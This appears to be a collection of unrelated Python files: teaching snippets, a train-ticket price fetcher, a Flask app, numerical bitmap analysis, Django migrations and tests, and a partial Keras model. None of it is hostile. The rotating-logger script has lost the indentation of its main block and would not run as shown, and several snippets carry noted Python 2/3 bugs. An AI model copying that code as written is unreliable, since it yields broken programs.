        super().__init__(self.dataset, batch_size, shuffle, validation_split, num_workers)
|
def main():
    """Demonstrate `continue`, `break` and the for-`else` clause on a string.

    Fixed: the original compared each single character against the whole
    string ('satring'), so the skip/stop branches never fired.
    """
    satring = 'this is a string'

    # Print string and skip all s's.
    for c in satring:
        if c == 's':
            continue
        print(c, end='')
    print()

    # Print string and stop at first s.
    for c in satring:
        if c == 's':
            break
        print(c, end='')
    print()

    # For Loop Else continues after last iterator value.
    for c in satring:
        print(c, end='')
    else:
        print(" else ")


if __name__ == "__main__": main()
|
import logging
from logging.handlers import RotatingFileHandler
import os
import yaml
import time
# Path to the component's YAML configuration (provides the log directory).
config_file = "/opt/cortx/component/component_config.yaml"
def read_log_location():
    """Read the log directory from the component config, creating it if missing."""
    with open(config_file) as conf_fh:
        conf = yaml.load(conf_fh, Loader=yaml.loader.SafeLoader)
    log_dir = conf["log_config"]["log_path"]
    os.makedirs(log_dir, exist_ok=True)
    return log_dir
if __name__ == "__main__":
i = 0
log_dir = read_log_location()
log_file = os.path.join(log_dir, "component.log")
logger = logging.getLogger('logger-with-rotation')
handler = RotatingFileHandler(log_file, maxBytes=200, backupCount=10)
logger.addHandler(handler)
logger.setLevel(logging.INFO)
try:
while True:
logger.info(f"Logging the count {i}")
print(".")
i += 1
time.sleep(2)
except KeyboardInterrupt:
print("\nShutting down the logger.")
exit(0)
|
import numpy as np
# Toy training set: 4 examples of 3 binary inputs; the target equals the
# first input column (the "pattern" the neuron should learn).
training_set_inputs = np.array([[0,0,1], [1,1,1], [1,0,1], [0,1,0]])
training_set_outputs = np.array([[0, 1, 1, 0]]).T
class NeuralNetwork():
    """A single sigmoid neuron: three inputs, one output, full-batch gradient descent."""

    def __init__(self):
        # Fixed seed so every run draws identical initial weights.
        np.random.seed(1)
        # 3x1 weight matrix, uniform in [-1, 1) with mean 0.
        self.synaptic_weights = 2 * np.random.random((3, 1)) - 1

    def _sigmoid(self, x):
        """Squash x into (0, 1) with the logistic function."""
        return 1 / (1 + np.exp(-x))

    def _sigmoid_derivative(self, x):
        """Gradient of the sigmoid, expressed in terms of its output value."""
        return x * (1 - x)

    def think(self, inputs):
        """Forward pass: weighted sum of the inputs through the sigmoid."""
        return self._sigmoid(np.dot(inputs, self.synaptic_weights))

    def train(self, training_set_inputs, training_set_outputs, iterations):
        """Run `iterations` rounds of gradient descent on the whole batch."""
        for step in range(iterations):
            prediction = self.think(training_set_inputs)
            residual = training_set_outputs - prediction
            # Error weighted by the sigmoid gradient, projected onto inputs.
            delta = np.dot(training_set_inputs.T,
                           residual * self._sigmoid_derivative(prediction))
            self.synaptic_weights += delta
            if (step % 1000) == 0:
                print ("Error after {} iterations is: {}".format(str(step), np.mean(np.abs(residual))))
# Train the neuron on the toy set and predict an unseen input.
x = NeuralNetwork()
x.train(training_set_inputs, training_set_outputs, 10000)
test = np.array([[1, 0, 1]])
print ("Value predicted for {} is: {}".format(test, str(x.think(test))))
|
# -*- coding: UTF-8 -*
import threading
from ProApi import *
from colorama import init, Fore, Back, Style
# Lock serializing the price-fetch threads (getPrice mutates a shared dict).
threadLock = threading.Lock()
# Initialize colorama; colors are reset manually per string, not per print.
init(autoreset=False)
class Colored(object):
    """Helpers that wrap a string in a bright ANSI foreground color."""

    def _paint(self, color, s):
        # Reset the foreground afterwards so later output is unaffected.
        return color + s + Fore.RESET

    # Foreground: red; background: default
    def red(self, s):
        return self._paint(Fore.LIGHTRED_EX, s)

    # Foreground: green; background: default
    def green(self, s):
        return self._paint(Fore.LIGHTGREEN_EX, s)

    def yellow(self, s):
        return self._paint(Fore.LIGHTYELLOW_EX, s)

    def white(self, s):
        return self._paint(Fore.LIGHTWHITE_EX, s)

    def blue(self, s):
        return self._paint(Fore.LIGHTBLUE_EX, s)
class myThread (threading.Thread):
    """Worker thread that fetches prices for one train into a shared dict."""

    def __init__(self, threadID, threadName, train_no, from_station_no, to_station_no, seat_types, date,pricesDic):
        threading.Thread.__init__(self)
        self.threadID = threadID
        self.threadName = threadName
        self.train_no = train_no
        self.from_station_no = from_station_no
        self.to_station_no = to_station_no
        self.seat_types = seat_types
        self.date = date
        # Shared output dict; access is serialized via the module-level lock.
        self.pricesDic = pricesDic

    def run(self):
        #print ("Starting thread: " + self.threadName)
        # Acquire the lock to synchronize with other threads.
        threadLock.acquire()
        getPrice(self.threadName, self.train_no, self.from_station_no, self.to_station_no, self.seat_types, self.date, self.pricesDic)
        # Release the lock so the next thread can proceed.
        threadLock.release()
        #print ("Exiting thread: " + self.threadName)
def getPrice(threadName, train_no, from_station_no, to_station_no, seat_types, date, pricesDic):
    """Query 12306 for the ticket prices of one train and fill *pricesDic*.

    Retries the HTTP request forever until a valid JSON payload is received,
    then maps the raw seat-type codes onto the fixed output keys 'A'..'J'
    (missing seat types become '').

    :param threadName: caller's thread label (kept for interface compat, unused)
    :param pricesDic:  shared output dict, mutated in place
    """
    while 1:
        try:
            headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}
            moneyUrl = "https://kyfw.12306.cn/otn/leftTicket/queryTicketPrice?train_no={}&from_station_no={}&to_station_no={}&seat_types={}&train_date={}".format(
                train_no, from_station_no, to_station_no, seat_types, date)
            req = urllib.request.Request(url=moneyUrl, headers=headers)
            r_price = urllib.request.urlopen(req).read().decode('utf-8')
            # strip a UTF-8 BOM the endpoint sometimes prepends
            if r_price.startswith(u'\ufeff'):
                r_price = r_price.encode('utf8')[3:].decode('utf-8')
            r_price = json.loads(r_price)
            break
        except Exception:
            # network hiccough / malformed payload: retry. (Was a bare
            # `except:`, which also swallowed KeyboardInterrupt.)
            continue
    price = dict(r_price['data'])
    # 'A': business/premier seat — prefer code 'A9', fall back to 'P'
    pricesDic['A'] = price.get('A9', price.get('P', ''))
    # Remaining outputs map 1:1 onto raw 12306 seat-type codes.
    seat_codes = (
        ('B', 'M'),   # first class
        ('C', 'O'),   # second class
        ('D', 'A6'),  # deluxe soft sleeper
        ('E', 'A4'),  # soft sleeper
        ('F', 'F'),   # motor sleeper
        ('G', 'A3'),  # hard sleeper
        ('H', 'A2'),  # soft seat
        ('I', 'A1'),  # hard seat
        ('J', 'WZ'),  # standing
    )
    for out_key, code in seat_codes:
        pricesDic[out_key] = price.get(code, '')
|
import os
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_restless import APIManager
def get_app(settings=None):
    """Build and configure the Flask application.

    *settings* is an import path / object understood by config.from_object.
    """
    application = Flask(__name__)
    application.config.from_object(settings)
    # silence the Flask-SQLAlchemy modification-tracking warning and overhead
    application.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
    return application
def get_db(app):
    """Create the SQLAlchemy extension bound to *app*.

    ``SQLAlchemy(app)`` already calls ``init_app(app)`` internally; the
    original extra ``db.init_app(app)`` initialised the extension on the
    same app twice, which Flask-SQLAlchemy warns about / rejects.
    """
    return SQLAlchemy(app)
# Module-level singletons: the Flask app (settings class named by the
# APP_SETTINGS env var), its SQLAlchemy handle, and the Flask-Restless
# API manager used by configure_routes().
app = get_app(settings=os.environ['APP_SETTINGS'])
db = get_db(app)
manager = APIManager(app, flask_sqlalchemy_db=db)
def configure_routes():
    """Expose the Mountain model as a REST endpoint (GET/POST/DELETE)."""
    # Imported here, not at module top, to avoid a circular import:
    # model.py needs `db` from this module.
    from model import Mountain
    manager.create_api(Mountain, methods=['GET', 'POST', 'DELETE'])
@app.route('/')
def hello():
    """Root route: static greeting."""
    return "Hello World!"
@app.route('/<name>')
def hello_name(name):
    """Greet the caller by path segment, e.g. /Ada -> "Hello Ada!"."""
    return "Hello {}!".format(name)
if __name__ == '__main__':
    #pass
    # Wire up the API routes, create missing tables, then serve on all
    # interfaces using the PORT from the app settings.
    configure_routes()
    db.create_all()
    app.run(host='0.0.0.0', port=app.config['PORT'])
|
skub = open("product.txt", "r")  # fixed-width product-code list, one code per line
root = "U-PLT"                   # common code prefix — NOTE(review): never used below
grade = []     # distinct grade characters  (column 6)
serie_a = []   # distinct 3-char A-series   (columns 8-10)
serie_b = []   # distinct 2-char B-series   (columns 12-13)
rin = []       # distinct 3-char ring codes (columns 15-17)
count = 0      # NOTE(review): never used
for line in skub:
    gradel = line[6:7]
    serie_al = line[8:11]
    serie_bl = line[12:14]
    rinl = line[15:18]
    # collect unique field values in first-seen order
    if not gradel in grade: grade.append(gradel)
    if not serie_al in serie_a: serie_a.append(serie_al)
    if not serie_bl in serie_b: serie_b.append(serie_bl)
    if not rinl in rin: rin.append(rinl)
import itertools
from pprint import pprint as pp
# g = sorted(grade)
# pp(g)
#
# sa = sorted(serie_a)
# pp(sa)
#
# sb = sorted(serie_b)
# pp(sb)
#
# r = sorted(rin)
# pp(r)
# Build the cartesian product step by step. NOTE(review): each step nests
# the previous step's tuples rather than flattening, so gsabrl contains
# ((grade, serie_a), serie_b), rin) shapes — confirm that is intended.
gsa = [sorted(grade), sorted(serie_a)]
gsal = list(itertools.product(*gsa))
pp(gsal)
gsab = [gsal, sorted(serie_b)]
gsabl = list(itertools.product(*gsab))
pp(gsabl)
gsabr = [gsabl, sorted(rin)]
gsabrl = list(itertools.product(*gsabr))
pp(gsabrl)
skub.close()
|
class Solution(object):
    """Add two numbers stored as linked lists, most-significant digit first."""
    def addTwoNumbers(self, l1, l2):
        """Sum the digit lists and return the LONGER input list, mutated in place.

        Strategy: copy both lists into arrays, left-pad the shorter with
        zeros, add digit-by-digit from the right with carry, then write the
        result digits back into the longer list's nodes (appending one node
        when a final carry pops out).
        """
        a1 = []   # digits of l1
        a2 = []   # digits of l2
        n1 = 0    # length of l1
        n2 = 0    # length of l2
        cur1 = l1
        cur2 = l2
        while cur1:
            a1.append(cur1.val)
            cur1 = cur1.next
            n1 += 1
        while cur2:
            a2.append(cur2.val)
            cur2 = cur2.next
            n2 += 1
        # Pad the shorter array and re-point cur1 at the longer list,
        # which will receive the result digits.
        if n1>n2:
            a2 = [0]*(n1-n2) + a2
            cur1 = l1
        else:
            a1 = [0]*(n2-n1) + a1
            cur1 = l2
        extra = False   # set when the sum gains one extra leading digit
        for i in range(max(n1,n2)-1,-1,-1):
            a1[i] += a2[i]
            if a1[i]>=10:
                a1[i] -= 10
                if i != 0:
                    a1[i-1] += 1   # propagate the carry leftwards
                else:
                    extra = True
                    a1 = [1]+a1    # carry out of the most significant digit
        # Write the result digits back into the longer list's nodes.
        i = 0
        while cur1.next:
            cur1.val = a1[i]
            cur1 = cur1.next
            i+=1
        cur1.val = a1[i]
        if extra:
            # One digit more than the longer input: append a tail node.
            # NOTE(review): assumes ListNode() constructs without args — confirm.
            new = ListNode()
            new.val = a1[i+1]
            cur1.next = new
        if n1>n2:
            return l1
        return l2
from collections import Counter
import pickle
import time
import numpy as np
from definitions import F, logF, logProbabilityF, max_array_size, large_log_sum
from conditions import *
## helpers
def countruns(x):
    """Count the runs of consecutive 1s in the binary vector *x*.

    A run starts wherever the sequence steps 0 -> 1, so we left-pad with a
    zero and count the rising edges of the difference signal.
    """
    with_leading_zero = np.insert(x, 0, 0)
    rising_edges = np.diff(with_leading_zero + 0) == 1
    return np.count_nonzero(rising_edges)
## computation functions for simple line plots
def total_counts_vs_m():
    """Tabulate total set counts for M = 2^3 .. 2^16 and pickle the result.

    Writes a dict {'M', 'array', 'runs', 'total'} (log-domain counts) to
    data/total_counts_vs_m.pickle.
    """
    M_vec = [2 ** e for e in range(3, 16+1)]
    c_array, c_runs, c_total = [], [], []
    for M in M_vec:
        print(M)
        a, r, t = total_counts_for_m(M)
        c_array.append(a)
        c_runs.append(r)
        c_total.append(t)
    data = {
        'M': M_vec,
        'array': c_array,
        'runs': c_runs,
        'total': c_total,
    }
    fname = 'data/total_counts_vs_m.pickle'
    # BUG FIX: pickle streams are binary — opening in text mode ('w') makes
    # pickle.dump raise TypeError on Python 3.
    with open(fname, 'wb') as f:
        pickle.dump(data, f)
def total_counts_for_m(M):
    # compute total count of all sets in certain regions, for given value of M
    # returns (in log domain):
    # - s_array: total count of all array sets
    # - s_runs: total count of all RLE sets
    # - s_total: total count of all sets (log10(2^M))
    MA = max_array_size(M)
    def f_array(M, MA, card):
        # NOTE(review): card/2 and MA/2 rely on Python 2 integer division —
        # under Python 3 range() would receive a float. Confirm target version.
        return range(card/2, card+1)
    c_array = range(0, MA+1)
    s_array = sum_F_smart(M, MA, c_array, f_array, array_cond_mutex(M, MA))
    def f_runs(M, MA, card):
        return range(1, min(MA/2+1, card/2))
    c_runs = range(0, M+1)
    s_runs = sum_F_smart(M, MA, c_runs, f_runs, runs_cond_mutex(M, MA))
    return s_array, s_runs, M * np.log10(2)
## computation functions for heatmaps (analytical)
# sum_F_smart is the latest version of the grid computation
# functions, and should be faster than grid_analytical_*
def sum_F_smart(M, MA, card_vec, runs_vec_func, cond):
    """Log-domain sum of F over an arbitrary (cardinality, runs) region.

    M and MA are constants. For every cardinality in card_vec,
    runs_vec_func(M, MA, card) supplies the runs values to visit; cond is a
    second, independently verified window predicate applied per cell.
    Returns the log10 of the summed count (-inf for an empty region).
    """
    s = -np.inf
    for card in card_vec:
        print(card)
        runs_vec = runs_vec_func(M, MA, card)
        for runs in runs_vec:
            if cond(card, runs):
                v = logF(card, runs, M)
                # accumulate in log domain without overflowing
                s = large_log_sum(v, s)
    return s
def grid_analytical_logF_conditional(M, card_vec, runs_vec, width, cond, debug=True):
    # previously known as sum_logF_for_condition
    """Grid of log-domain rectangle sums of F, restricted by *cond*.

    Each cell (m, n) sums F over the width x width rectangle anchored at
    (card_vec[n], runs_vec[m]). Cells start at -inf (log of zero).
    """
    if debug:
        print('summing for %s' % cond.__name__)
    t0 = time.time()
    z = np.ones((len(runs_vec), len(card_vec)))*-np.inf
    for n, card in enumerate(card_vec):
        if debug:
            # print('x = %d (%d/%d)' % (card, n, len(card_vec)))
            pass
        for m, runs in enumerate(runs_vec):
            z[m, n] = sum_logF_over_rectangle_conditional(M, [card, card+width], [runs, runs+width], cond)
            # print(n, m, z[m, n])
            # NOTE(review): cells are initialised to -inf and hold log sums,
            # so the `== 0` / `> 0` tests compare log values, not emptiness —
            # confirm this early-exit condition is what's intended.
            if m > 0 and z[m, n] == 0 and z[m-1, n] > 0:
                # passed out of region, stop counting
                break
    if debug:
        print('%f sec' % (time.time() - t0))
    return z
def sum_logF_over_rectangle_conditional(M, card_range, runs_range, cond):
    """Log-domain sum of F over one rectangle, filtered by *cond*.

    card_range/runs_range are half-open [lo, hi) pairs. Returns -inf when
    nothing in the rectangle satisfies cond.
    """
    # when summing a bunch of numbers with widely varying magnitude,
    # only need to sum the top few for an accurate result.
    t0 = time.time()
    s = -np.inf
    for card in range(card_range[0], card_range[1]):
        for runs in range(runs_range[0], runs_range[1]):
            if runs > card or runs > M-card+1:
                # impossible region (more runs than set bits, or than gaps);
                # larger runs in this row are impossible too, so stop the row
                break
            if cond(card, runs):
                # v = logF_nocheck(card, runs, M)
                v = logF(card, runs, M)
                # print(card, runs, v)
                s = large_log_sum(s, v)
    # print('10^%d sets in %sx%s (%f sec)' % (s, card_range, runs_range, time.time()-t0))
    dt = time.time() - t0
    return s
def grid_analytical_integral(M, cell_size):
    # naively compute downsampled grid by summing over evenly spaced rectangular regions
    # NOTE(review): M/(2*cell_size) etc. rely on Python 2 integer division;
    # under Python 3 np.zeros would receive floats and raise. Confirm version.
    grid = np.zeros((M/(2*cell_size)+1, M/cell_size+1))
    # cvec and rvec represent lower-left corner of cell
    cvec = range(0, M+1, cell_size)
    rvec = range(0, M/2+1, cell_size)
    for x, card in enumerate(cvec):
        for y, runs in enumerate(rvec):
            grid[y, x] = sum_F_over_rectangle(M, [card, card+cell_size], [runs, runs+cell_size])
    # print(grid)
    return grid, cvec, rvec
def sum_F_over_rectangle(M, card_range, runs_range):
    # naively sum exact (linear-domain) F values over a half-open rectangle
    s = 0
    for card in range(card_range[0], card_range[1]):
        for runs in range(runs_range[0], runs_range[1]):
            v = F(card, runs, M)
            s += v
            # print('%d added for (%d, %d) - (%s, %s)' % (v, card, runs, card_range, runs_range))
    return s
def grid_analytical_log_prob_sampled(Nbits, width):
    # compute samples of the grid for a given Nbits.
    # samples are spaced 'width' pixels apart
    # NOTE(review): width/2 and Nbits/width rely on Python 2 integer
    # division — confirm before running under Python 3.
    grid = np.ones((width/2+1, width+1)) * -np.inf
    cvec = range(1, Nbits+1, Nbits/width)
    rvec = range(1, Nbits/2+1, Nbits/width)
    for x, cardinality in enumerate(cvec):
        print(cardinality)
        for y, runcount in enumerate(rvec):
            grid[y, x] = logProbabilityF(cardinality, runcount, Nbits)
    return grid, cvec, rvec
def grid_analytical_log_sampled(M, width):
    """Sampled log10(F) grid: width x width/2 samples spaced M/width apart.

    NOTE(review): the divisions assume Python 2 integer semantics.
    """
    grid = np.zeros((width/2, width))
    cvec = range(0, M, M/width)
    rvec = range(0, M/2, M/width)
    for x, cardinality in enumerate(cvec):
        print(cardinality)
        for y, runcount in enumerate(rvec):
            grid[y, x] = logF(cardinality, runcount, M)
    return grid, cvec, rvec
def grid_analytical_exact(Nbits):
    # compute full grid for Nbits. will be slow for Nbits > 2^10 or so
    # (grid indices are 0-based, so cell [r-1, c-1] holds F(c, r, Nbits))
    grid = np.zeros((Nbits/2, Nbits))
    cvec = range(1, Nbits+1)
    rvec = range(1, Nbits/2+1)
    for cardinality in cvec:
        for runcount in rvec:
            grid[runcount-1, cardinality-1] = F(cardinality, runcount, Nbits)
    return grid, cvec, rvec
## computation functions for heatmaps (stochastic, brute-force)
def grid_stochastic_large(Nbits, Niter, density=None, Nset=None):
    """Monte-Carlo (runs, cardinality) histogram for roaring-sized Nbits.

    For huge Nbits a dense grid is infeasible, so samples are accumulated
    in a Counter and only the populated bounding box is materialised.
    Exactly one of *density* (per-bit probability) or *Nset* (exact number
    of set bits — a 1-d marginal slice at N=Nset) must be given.

    Returns (grid, n_vec, nr_vec): the count grid plus its x/y axis vectors.
    """
    result = Counter()
    n_min, n_max = np.inf, -np.inf
    nr_min, nr_max = np.inf, -np.inf
    for k in range(Niter):
        if density:
            bits = np.random.random(size=(Nbits,)) <= density
        elif Nset:
            # BUG FIX: this branch previously fell through with `bits`
            # undefined (NameError). Set exactly Nset bits via a random
            # permutation, as the original TODO described.
            bits = np.zeros(Nbits, dtype=bool)
            bits[np.random.permutation(Nbits)[:Nset]] = True
        else:
            raise ValueError('either density or Nset must be given')
        n = np.count_nonzero(bits)
        nr = countruns(bits)
        n_min = min(n_min, n)
        n_max = max(n_max, n)
        nr_min = min(nr_min, nr)
        nr_max = max(nr_max, nr)
        result[(nr, n)] += 1
    n_vec = np.arange(n_min, n_max+1)
    nr_vec = np.arange(nr_min, nr_max+1)
    grid = np.zeros((len(nr_vec), len(n_vec)))
    for (nr, n), count in result.items():
        grid[nr-nr_min, n-n_min] = count
    return grid, n_vec, nr_vec
def grid_stochastic(Nbits, Niter, density):
    # for moderately large Nbits, we have to sample
    # also return the x, y axis vectors
    # NOTE(review): Nbits/2 relies on Python 2 integer division; np.zeros
    # rejects float shapes under Python 3. Confirm target version.
    grid = np.zeros((Nbits/2+1, Nbits+1))
    for k in range(Niter):
        # Bernoulli(density) bit vector; tally its (runs, cardinality) cell
        bits = np.random.random(size=(Nbits,)) <= density
        n = np.count_nonzero(bits)
        nr = countruns(bits)
        grid[nr, n] += 1
    return grid, range(0, Nbits+1), range(0, Nbits/2+1)
def grid_deterministic(Nbits=8, debug=False):
    """Exhaustive (runs, cardinality) histogram over every Nbits-bit set.

    Only feasible for small Nbits (2**Nbits iterations). Returns
    (grid, card_axis, runs_axis).
    """
    # // keeps integer semantics on both Python 2 and 3
    grid = np.zeros((Nbits // 2 + 1, Nbits + 1))
    vals = range(2**Nbits)
    for i in vals:
        # BUG FIX: the bit string width was hard-coded to 8; derive it from
        # Nbits so other sizes enumerate correctly.
        bitstr = format(i, '0{}b'.format(Nbits))
        bits = np.array([1 if b == '1' else 0 for b in bitstr])
        n = sum(bits)
        nr = countruns(bits)
        grid[nr, n] += 1
        if debug:
            # BUG FIX: the format string had 4 specifiers for 6 arguments,
            # raising TypeError whenever debug=True.
            print('%3d %s %2d %d %s %s' % (i, bitstr, n, nr, array_encode(bits), rl_encode(bits)))
    return grid, range(0, Nbits + 1), range(0, Nbits // 2 + 1)
def array_encode(bits, bpe=3):
    """Array-encode a bit vector: the set-bit indices as *bpe*-bit binary words.

    BUG FIX: np.where(bits) returns a tuple of index arrays, so the loop
    iterated one whole array (format() then raised); np.flatnonzero yields
    the indices themselves. Also honours the previously ignored *bpe*
    parameter instead of the hard-coded '03b'.
    """
    indices = np.flatnonzero(bits)
    return ' '.join(format(int(a), '0{}b'.format(bpe)) for a in indices)
def rl_encode(bits, bpe=3):
    # Run-length encoding counterpart to array_encode — unimplemented stub;
    # returns None (grid_deterministic prints that as 'None' in debug mode).
    pass
|
# Generated by Django 3.2.3 on 2021-06-12 15:42
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema migration — do not edit retroactively.

    Adds IngredientSize.multiple_option (bool, default False) and changes
    the special_price fields on IngredientSize and Pizza to integers
    defaulting to 0.
    """

    dependencies = [
        ('pizza_app', '0012_auto_20210612_0526'),
    ]

    operations = [
        migrations.AddField(
            model_name='ingredientsize',
            name='multiple_option',
            field=models.BooleanField(default=False),
        ),
        migrations.AlterField(
            model_name='ingredientsize',
            name='special_price',
            field=models.IntegerField(default=0),
        ),
        migrations.AlterField(
            model_name='pizza',
            name='special_price',
            field=models.IntegerField(default=0),
        ),
    ]
|
"""
剑指offer第12题,矩阵中的路径。
请设计一个函数,用来判断在一个矩阵中是否存在一条包含某字符串所有字符的路径。路径可以从矩阵中的任意一格开始,每一步可以在矩阵中向左、右、上、下移动一格。如果一条路径经过了矩阵的某一格,那么该路径不能再次进入该格子。例如,在下面的3×4的矩阵中包含一条字符串“bfce”的路径(路径中的字母用加粗标出)。
[["A","B","c","e"],
["s","F","c","s"],
["a","D","e","e"]]
但矩阵中不包含字符串“abfb”的路径,因为字符串的第一个字符b占据了矩阵中的第一行第二个格子之后,路径不能再次进入这个格子。
来源:力扣(LeetCode)
链接:https://leetcode-cn.com/problems/ju-zhen-zhong-de-lu-jing-lcof
著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
"""
# We just looked at the eight-queens problem; clearly this problem can be
# solved with a similar backtracking approach.
def exist1(board, word):
    """Return True when *word* can be traced through *board* via 4-adjacent
    moves without revisiting a cell.

    BUG FIXES vs. the original draft:
    - right/left bounds tested `col < len(board[0])` and `col >= 0` instead
      of `col + 1 < ...` / `col - 1 >= 0`, allowing out-of-range recursion;
    - recursive results were discarded and nothing was ever returned;
    - visited cells were appended to `path` but never popped, permanently
      blocking them for other branches.
    The board is mutated during the search ('#' marks the current path) but
    restored before returning.
    """
    if not board or not board[0]:
        return False
    rows, cols = len(board), len(board[0])

    def _search(row, col, idx):
        # backtracking DFS: does word[idx:] start at (row, col)?
        if idx == len(word):
            return True
        if not (0 <= row < rows and 0 <= col < cols) or board[row][col] != word[idx]:
            return False
        saved = board[row][col]
        board[row][col] = '#'   # mark as on the current path
        found = (_search(row + 1, col, idx + 1)
                 or _search(row - 1, col, idx + 1)
                 or _search(row, col + 1, idx + 1)
                 or _search(row, col - 1, idx + 1))
        board[row][col] = saved  # un-mark on the way back out
        return found

    return any(_search(r, c, 0) for r in range(rows) for c in range(cols))
# If the goal is simply "return True when the board contains the path",
# the code can be tightened up as follows.
def checkWordTrF(board, word, wordIndex, row, col):
    """Backtracking check: does word[wordIndex:] start at board[row][col]?

    Marks visited cells with '#' during the recursion and restores them
    afterwards, so the board is unchanged on return.
    """
    if wordIndex == len(word):
        return True
    inside = 0 <= row < len(board) and 0 <= col < len(board[0])
    if not inside or board[row][col] != word[wordIndex]:
        return False
    # Block this cell with a character that cannot occur in the word.
    saved = board[row][col]
    board[row][col] = "#"
    # any() short-circuits exactly like the original chained `or`s.
    found = any(
        checkWordTrF(board, word, wordIndex + 1, row + dr, col + dc)
        for dr, dc in ((1, 0), (-1, 0), (0, 1), (0, -1))
    )
    board[row][col] = saved
    return found
if __name__ == '__main__':
    # Sample boards; only board2 is exercised below.
    board = [["a", "b", "c", "e"],
             ["s", "f", "c", "s"],
             ["a", "d", "e", "e"]]
    path = []
    board2 = [["C","A","A"],["A","A","A"],["B","C","D"]]
    # Search "AAB" starting from the centre cell (1, 1); expected True.
    res = checkWordTrF(board2, "AAB", 0, 1, 1)
    print(res)
|
from django.test import TestCase
from django.contrib.auth.models import User

from .models import Profile, Image, Comment, Follow
# Create your tests here.
class ProfileTestClass(TestCase):
    '''
    Test case for the Profile class
    '''
    def setUp(self):
        '''
        Method that creates an instance of Profile class
        '''
        # Create instance of Profile class (not saved to the DB)
        self.new_profile = Profile(bio="I am Groot")
    def test_instance(self):
        '''
        Test case to check if self.new_profile in an instance of Profile class
        '''
        self.assertTrue(isinstance(self.new_profile, Profile))
    def test_get_profiles(self):
        '''
        Test case to check if all profiles are gotten from the database
        '''
        gotten_profiles = Profile.get_profiles()
        profiles = Profile.objects.all()
        self.assertTrue(len(gotten_profiles) == len(profiles))
    def test_get_other_profiles(self):
        '''
        Test case to check if all profiles are gotten from the database
        '''
        # NOTE(review): this test sets up data but makes no assertion, so it
        # only verifies that get_other_profiles() does not raise.
        self.james = User(username="kiki")
        self.james.save()
        self.jane = User(username="ja-ne")
        self.jane.save()
        self.test_profile = Profile(user=self.jane, bio="Another Profile")
        gotten_profiles = Profile.get_other_profiles(self.james.id)
        profiles = Profile.objects.all()
class ImageTestClass(TestCase):
    '''
    Test case for the Image class
    '''
    def setUp(self):
        '''
        Method that creates an instance of Image class
        '''
        # Create a Image instance (not saved to the DB)
        self.new_Image = Image(
            caption='Python James is Muriuki who wrote Python content for Moringa School')
    def test_instance(self):
        '''
        Test case to check if self.new_Image in an instance of Image class
        '''
        self.assertTrue(isinstance(self.new_Image, Image))
    def test_get_Images(self):
        '''
        Test case to check if all Images are gotten from the database
        '''
        gotten_images = Image.get_Images()
        images = Image.objects.all()
        # BUG FIX: the assertion referenced the undefined name
        # `gotten_Images` (capital I), raising NameError whenever it ran.
        self.assertTrue(len(gotten_images) == len(images))
    def test_get_profile_Images(self):
        '''
        Test case to check if all Images for a specific profile are gotten from the database
        '''
        self.james = User(username="kiki")
        self.james.save()
        self.jane = User(username="ja-ne")
        self.jane.save()
        self.test_profile = Profile(user=self.jane, bio="Another Profile")
        self.test_image = Image(user=self.jane, caption="Another Profile")
        gotten_profile = Image.get_profile_images(self.jane.id)
        profiles = Image.objects.all()
        self.assertTrue(len(gotten_profile) == len(profiles))
class FollowTestClass(TestCase):
    '''
    Test case for the Follow class
    '''
    # NOTE(review): Follow is not in this module's `from .models import ...`
    # line, so these tests raise NameError as written — Follow must be added
    # to that import.
    def test_instance(self):
        '''
        Test case to check if self.new_Image in an instance of Follow class
        '''
        self.james = User(username="kiki")
        self.james.save()
        self.jane = User(username="ja-ne")
        self.jane.save()
        self.test_profile = Profile(user=self.jane, bio="Another Profile")
        self.new_follow = Follow(user=self.jane, profile=self.test_profile)
        self.assertTrue(isinstance(self.new_follow, Follow))
    def test_get_following(self):
        '''
        Test case to check if get following is getting profiles a specific user is following
        '''
        self.james = User(username="kiki")
        self.james.save()
        self.jane = User(username="ja-ne")
        self.jane.save()
        self.test_profile = Profile(user=self.jane, bio="Another Profile")
        self.test_Image = Image(user=self.jane, caption="Another Profile")
        self.new_follow = Follow(user=self.jane, profile=self.test_profile)
        gotten_following = Follow.get_following(self.jane.id)
        followings = Follow.objects.all()
        self.assertTrue(len(gotten_following) == len(followings))
class CommentTestClass(TestCase):
    '''
    Test case for the Comment class
    '''
    def setUp(self):
        '''
        Method that creates an instance of Comment class
        '''
        # Create a Comment instance (not saved to the DB)
        self.new_comment = Comment(
            comment_content='Python James is Muriuki who wrote Python content for Moringa School')
    def test_instance(self):
        '''
        Test case to check if self.new_comment in an instance of Comment class
        '''
        self.assertTrue(isinstance(self.new_comment, Comment))
    def test_get_Image_comments(self):
        '''
        Test case to check if get Image comments is getting comments for a specific Image
        '''
        self.james = User(username="kiki")
        self.james.save()
        self.jane = User(username="ja-ne")
        self.jane.save()
        self.test_profile = Profile(user=self.jane, bio="Another Profile")
        self.test_Image = Image(user=self.jane, caption="Another Profile")
        self.test_comment = Comment(
            Image=self.test_Image, comment_content="Wow")
        gotten_comments = Comment.get_Image_comments(self.test_Image.id)
        comments = Comment.objects.all()
        # No comments were saved so expect True
        self.assertTrue(len(gotten_comments) == len(comments))
from os import listdir
import os
from os.path import isfile, join, isdir
import subprocess
# Run neural network for targetFile
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential
from keras.optimizers import RMSprop
from keras.layers import Conv2D, MaxPooling2D
from keras.layers import Activation, Dropout, Flatten, Dense
from keras.callbacks import CSVLogger
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
#_____________________ Define model
# Model 5 — VGG-style binary classifier over spectrogram images.
# NOTE(review): Conv2D(32, 3, 3, border_mode=...) is the Keras 1.x calling
# convention; Keras 2+ needs Conv2D(32, (3, 3), padding='same'). Confirm the
# pinned Keras version before touching this.
IMAGE_WIDTH, IMAGE_HEIGHT = 852, 480   # spectrogram dimensions in pixels
EPOCHS = 20       # NOTE(review): unused here — inference only
BATCH_SIZE = 8    # NOTE(review): unused here — inference only
TEST_SIZE = 149   # NOTE(review): unused here — inference only
input_shape = (IMAGE_WIDTH, IMAGE_HEIGHT, 3)
model = Sequential()
# Six conv blocks doubling the filter count (32 -> 1024), each followed by 2x2 max-pooling.
model.add(Conv2D(32, 3, 3, border_mode='same', input_shape=input_shape, activation='relu'))
